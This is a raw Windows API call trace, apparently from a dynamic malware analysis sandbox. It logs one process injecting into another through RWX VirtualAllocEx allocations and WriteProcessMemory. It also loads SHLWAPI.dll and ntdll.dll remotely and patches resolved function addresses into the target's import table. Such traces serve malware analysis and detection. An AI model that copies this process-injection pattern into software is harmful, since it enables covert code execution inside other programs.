	[0188.117] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.117] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.117] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.117] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.117] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.117] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.118] ResetEvent (hEvent=0x478) returned 1
	[0188.118] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.118] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.118] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.118] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.118] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055310, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.119] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.119] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.119] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.119] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.119] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.119] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.120] ResetEvent (hEvent=0x478) returned 1
	[0188.120] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.120] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.120] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.120] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055314, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.120] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.121] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0188.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6f20, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=12 | out: lpWideCharStr="SHLWAPI.dll") returned 12
	[0188.121] lstrlenW (lpString="SHLWAPI.dll") returned 11
	[0188.121] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.121] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0188.121] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.121] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.121] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.122] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.122] ResetEvent (hEvent=0x478) returned 1
	[0188.122] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.123] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.123] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.124] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.124] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.124] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.124] lstrlenA (lpString="StrCmpNA") returned 8
	[0188.124] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.125] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6ee6*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6ee6*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0188.125] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.125] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.125] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.126] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.126] ResetEvent (hEvent=0x478) returned 1
	[0188.126] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.127] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.127] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.127] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.127] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.127] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055288, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.128] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.128] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.128] lstrlenA (lpString="StrCmpNIA") returned 9
	[0188.128] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.128] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6eda*, nSize=0xa, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6eda*, lpNumberOfBytesWritten=0x12857c*=0xa) returned 1
	[0188.128] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.128] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.129] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.129] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.129] ResetEvent (hEvent=0x478) returned 1
	[0188.129] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.129] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.130] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.130] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.130] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.130] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005528c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.130] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.130] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.130] lstrlenA (lpString="wnsprintfA") returned 10
	[0188.130] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.131] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f14*, nSize=0xb, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f14*, lpNumberOfBytesWritten=0x12857c*=0xb) returned 1
	[0188.131] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.131] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.131] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.131] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.132] ResetEvent (hEvent=0x478) returned 1
	[0188.132] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.132] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.132] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.132] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.132] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.132] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055290, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.133] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.133] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.133] lstrlenA (lpString="StrStrIA") returned 8
	[0188.133] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.133] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6ef2*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6ef2*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0188.134] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.134] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.134] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.135] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.135] ResetEvent (hEvent=0x478) returned 1
	[0188.135] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.135] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.135] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.135] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.135] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055294, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.136] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.136] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.136] lstrlenA (lpString="StrStrIW") returned 8
	[0188.136] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.136] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6efe*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6efe*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0188.137] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.137] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.137] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.137] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.138] ResetEvent (hEvent=0x478) returned 1
	[0188.138] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.139] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.139] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.139] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.139] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055298, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.139] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.140] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.140] lstrlenA (lpString="StrStrA") returned 7
	[0188.140] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.140] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f0a*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f0a*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
	[0188.140] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.140] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.140] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.141] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.141] ResetEvent (hEvent=0x478) returned 1
	[0188.141] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.141] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0188.141] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.141] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.142] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005529c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0188.142] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.142] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0188.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6f74, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0188.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078c0
	[0188.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xeb6f74, cbMultiByte=-1, lpWideCharStr=0x23078c0, cchWideChar=10 | out: lpWideCharStr="ntdll.dll") returned 10
	[0188.142] lstrlenW (lpString="ntdll.dll") returned 9
	[0188.142] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.142] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x23078c0*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23078c0*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0188.143] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0188.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.143] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.143] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0188.143] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0188.144] ResetEvent (hEvent=0x478) returned 1
	[0188.144] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0188.144] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0188.144] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.144] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0188.144] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0188.144] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078c0) returned 1
	[0188.144] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.144] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0188.145] lstrlenA (lpString="memchr") returned 6
	[0188.145] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0188.145] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb6f60*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb6f60*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0188.145] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0188.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0188.145] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0188.145] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0188.146] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0188.146] ResetEvent (hEvent=0x478) returned 1
	[0188.146] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
